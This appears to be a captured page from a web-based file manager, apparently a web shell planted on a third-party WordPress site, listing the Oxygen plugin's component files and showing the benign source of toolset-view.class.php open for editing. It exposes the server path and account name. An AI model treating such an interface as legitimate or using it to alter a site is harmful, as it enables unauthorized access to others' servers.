golden hour
/home/godaofbq/hyperbarics4u.com/wp-content/plugins/oxygen/component-framework/components/classes
⬆️ Go Up
Upload
File/Folder
Size
Actions
a11y-site-nav
-
Del
OK
code-block.class.php
9.79 KB
Del
OK
comment-form.class.php
7.6 KB
Del
OK
comments-list-templates
-
Del
OK
comments-list.class.php
14.51 KB
Del
OK
data.comment-form.class.php
4.38 KB
Del
OK
div-block.class.php
4.34 KB
Del
OK
dynamic-list.class.php
318.88 KB
Del
OK
easy-posts-templates
-
Del
OK
easy-posts.class.php
70.05 KB
Del
OK
fancy-icon.class.php
7.65 KB
Del
OK
gallery
-
Del
OK
gallery.class.php
45.29 KB
Del
OK
header-row-center.class.php
1.61 KB
Del
OK
header-row-left.class.php
1.59 KB
Del
OK
header-row-right.class.php
1.6 KB
Del
OK
header-row.class.php
7.26 KB
Del
OK
header.class.php
12.43 KB
Del
OK
headline.class.php
3.35 KB
Del
OK
icon-box.class.php
29.44 KB
Del
OK
image.class.php
12.35 KB
Del
OK
inner-content.class.php
5.73 KB
Del
OK
li.class.php
3.08 KB
Del
OK
link-button.class.php
5.73 KB
Del
OK
link-text.class.php
5.25 KB
Del
OK
link-wrapper.class.php
4.74 KB
Del
OK
login-form.class.php
6.88 KB
Del
OK
map.class.php
2.36 KB
Del
OK
menu-pro
-
Del
OK
menu-pro.class.php
74.72 KB
Del
OK
menu.class.php
32.7 KB
Del
OK
modal.class.php
39.85 KB
Del
OK
nestable-shortcode.class.php
3.85 KB
Del
OK
new-columns.class.php
7.94 KB
Del
OK
pricing-box.class.php
80.82 KB
Del
OK
progress-bar.class.php
21.21 KB
Del
OK
reusable.class.php
2.27 KB
Del
OK
rich-text.class.php
4.67 KB
Del
OK
search-form.class.php
6.92 KB
Del
OK
section.class.php
5.69 KB
Del
OK
selector.class.php
3.3 KB
Del
OK
shape-divider
-
Del
OK
shape-divider.class.php
101.89 KB
Del
OK
shortcode.class.php
5.7 KB
Del
OK
sidebar.class.php
2.1 KB
Del
OK
site-nav.class.php
54.08 KB
Del
OK
slide.class.php
3.34 KB
Del
OK
slider.class.php
22.83 KB
Del
OK
social-icons.class.php
23.93 KB
Del
OK
soundcloud.class.php
3.92 KB
Del
OK
span.class.php
4.5 KB
Del
OK
superbox.class.php
26.58 KB
Del
OK
svg-icon.class.php
6.78 KB
Del
OK
tab-content.class.php
2.81 KB
Del
OK
tab.class.php
2.79 KB
Del
OK
tabs-contents.class.php
3.08 KB
Del
OK
tabs.class.php
7.16 KB
Del
OK
testimonial.class.php
32.71 KB
Del
OK
text-block.class.php
3.64 KB
Del
OK
toggle.class.php
9.31 KB
Del
OK
toolset-view.class.php
4.67 KB
Del
OK
video.class.php
4.84 KB
Del
OK
widget.class.php
6.67 KB
Del
OK
Edit: toolset-view.class.php
<?php /** * CT_Toolset_View Class * * @since 2.1 */ Class CT_Toolset_View extends CT_Component { function __construct( $options ) { // run initialization $this->init( $options ); // change button place remove_action("ct_toolbar_fundamentals_list", array( $this, "component_button" ) ); add_filter( 'template_include', array( $this, 'ct_shortcode_single_template'), 100 ); // Add shortcodes add_shortcode( $this->options['tag'], array( $this, 'add_shortcode' ) ); add_oxygen_element( $this->options['tag'], array( $this, 'add_shortcode' ) ); add_action( "init", array( $this, "maybe_show_component" ), 10 ); } function maybe_show_component() { // At this point, all external plugin's constants are defined if( defined( 'WPV_VERSION' ) && version_compare( WPV_VERSION, '2.6' ) >= 0 ) { // Add this component button add_action("ct_toolbar_data_folder", array( $this, "component_button"), 8 ); } } /** * Add a [ct_toolset_view] shortcode to WordPress * * @since 2.1 */ function add_shortcode( $atts, $content ) { $options = $this->set_options( $atts ); ob_start(); $full_shortcode = '[wpv-view name="' . $options['view'] . '"]'; ?><<?php echo esc_attr($options['tag']) ?> id="<?php echo esc_attr($options['selector']); ?>" class="<?php echo esc_attr($options['classes']); ?>"><?php echo do_shortcode( $full_shortcode ); ?></<?php echo esc_attr($options['tag']) ?>><?php return ob_get_clean(); } /** * Add Dynamic Data folder button * * @since 2.1 */ function component_button() { if (oxygen_hide_element_button('ct_toolset_view')) { return; } ?> <div class="oxygen-add-section-element" data-searchid="<?php echo strtolower( preg_replace('/\s+/', '_', sanitize_text_field( $this->options['name'] ) ) ) ?>" ng-click="iframeScope.addComponent('ct_toolset_view');"> <img src='<?php echo CT_FW_URI; ?>/toolbar/UI/oxygen-icons/add-icons/dynamicdata.svg' /> <?php _e("Toolset View","oxygen"); ?> </div> <?php } function ct_shortcode_single_template( $template ) { $new_template = ''; if(isset($_REQUEST['action']) && stripslashes($_REQUEST['action']) == 'ct_render_shortcode') { $nonce = $_REQUEST['nonce']; $post_id = $_REQUEST['post_id']; // check nonce if ( ! wp_verify_nonce( $nonce, 'oxygen-nonce-' . $post_id ) ) { // This nonce is not valid. die( 'Security check' ); } if ( file_exists(dirname(dirname( __FILE__)) . '/layouts/' . 'shortcode.php') ) { $new_template = dirname(dirname( __FILE__)) . '/layouts/' . 'shortcode.php'; } } if ( '' != $new_template ) { return $new_template ; } return $template; } } $args = array( 'post_type' => 'view', 'post_status' => 'publish', 'numberposts' => -1 ); $views_object = get_posts($args); $views_array = []; foreach ($views_object as $item) { $views_array[ $item->post_name ] = $item->post_title; } global $oxygen_vsb_components; $oxygen_vsb_components['toolset_view'] = new CT_Toolset_View ( array( 'name' => 'Toolset View', 'tag' => 'ct_toolset_view', 'shortcode' => true, 'params' => array( array( "param_name" => "view", "value" => $views_array, "type" => "view_dropdown", "heading" => __("Toolset View","oxygen"), "css" => false, ), array( "type" => "tag", "heading" => __("Tag"), "param_name" => "tag", "value" => array ( "div" => "DIV", "p" => "P", "h1" => "H1", "h2" => "H2", "h3" => "H3", "h4" => "H4", "h5" => "H5", "h6" => "H6", "section" => "section", "footer" => "footer", "header" => "header", "article" => "article", "main" => "main", "figcaption"=> "figcaption", "time" => "time", "summary" => "summary", "details" => "details", "aside" => "aside", "figure" => "figure", "hgroup" => "hgroup", "mark" => "mark", "nav" => "nav", ), "css" => false, ), ), 'advanced' => array( "other" => array( "values" => array ( 'placeholder-width-unit' => 'px', 'placeholder-height-unit' => 'px', ) ), 'allow_shortcodes' => true, ) ) );
Save